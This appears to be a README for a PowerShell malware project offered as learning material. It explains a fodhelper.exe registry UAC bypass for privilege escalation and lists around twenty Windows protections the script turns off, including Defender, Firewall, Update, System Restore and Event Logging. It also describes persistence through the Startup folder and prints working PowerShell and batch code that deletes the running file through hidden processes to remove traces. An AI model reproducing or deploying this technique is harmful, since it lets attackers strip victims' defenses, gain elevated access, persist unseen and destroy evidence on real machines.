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A PowerShell malware that disables almost all the Windows Security features with UAC bypass.


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WARNING!! This script was NOT optimized to shorten and obfuscate the code but rather intended to have as much readability as possible for new coders to learn!

How does this script work?

  • Well, if we want to disable Windows's security features, we can use Registry Editor for that. However, we will need administrative privileges to access regedit. Like who's gonna run a malware as administrator?

    Privilege Escalation

    • In Windows, when a user is requesting to open “Manage Optional Features” in settings, a process is created under the name “fodhelper.exe”. This process is running with the highest privileges without any permissions being asked directly when executed because it's a trusted binary and signed by Microsoft.

    • The following checks are performed in the registry upon start of fodhelper.exe:

    • Since these registry entries doesn’t exist, we can create this structure in the registry to manipulate fodhelper to execute our script with higher privileges bypassing the User Account Control (UAC).

Features that the script will disable:

- All The Windows Defender Features (including SmartScreen)
- Windows Firewall
- Windows Update
- System Restore
- Task Manager
- Command Prompt (Cmd)
- Remote Desktop
- User Account Control (UAC)
- Windows Security Center
- Windows Error Reporting
- Remote Assistance
- Windows Update Medic Service
- Background Intelligent Transfer Service (BITS)
- Windows Script Host
- Event Logging
- Windows Security Notifications
- Windows Search
- Automatic Maintenance
- Virtualization Based Security

Self Replication and Self Destruction

  • After disabling the Windows Security features, the script will copy itself to the startup folder with a random file name for persistence and will delete all traces of its execution.

  • However, when the script is compiled and executed as an ".exe" file, it becomes a process, and we can no longer modify or delete the file itself due to the File Locking Mechanism.

  • Since we couldn't delete the script itself after it has done its job, we have 2 alternatives to delete it:

$ScriptPath = $MyInvocation.MyCommand.Path
$ExePath = (Get-Process -Id $PID).Path
$FullPath = if ($ScriptPath) { $ScriptPath } else { $ExePath }

# First alternative: Start another process to delete it
Start-Process powershell.exe -ArgumentList "-NoProfile -Command `"Remove-Item -Path '$FullPath' -Force -ErrorAction SilentlyContinue`"" -WindowStyle Hidden

# Second alternative: Create a temporary batch script to delete it
$tempScript = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), [System.IO.Path]::GetRandomFileName() + ".cmd")
$cmdContent = "chcp 1252" + [Environment]::NewLine + "ping -n 2 > nul" + [Environment]::NewLine + "del /q /f `"$FullPath`"" + [Environment]::NewLine + "del /q /f %~f0"
Set-Content -Path $tempScript -Value $cmdContent
Start-Process cmd.exe -ArgumentList "/c $tempScript" -WindowStyle Hidden

The first alternative has been used in the script.


You can use the PS2EXE tool to convert the script into an executable.

If you executed the script, you can also run the Enable.reg file to repair the damage it caused.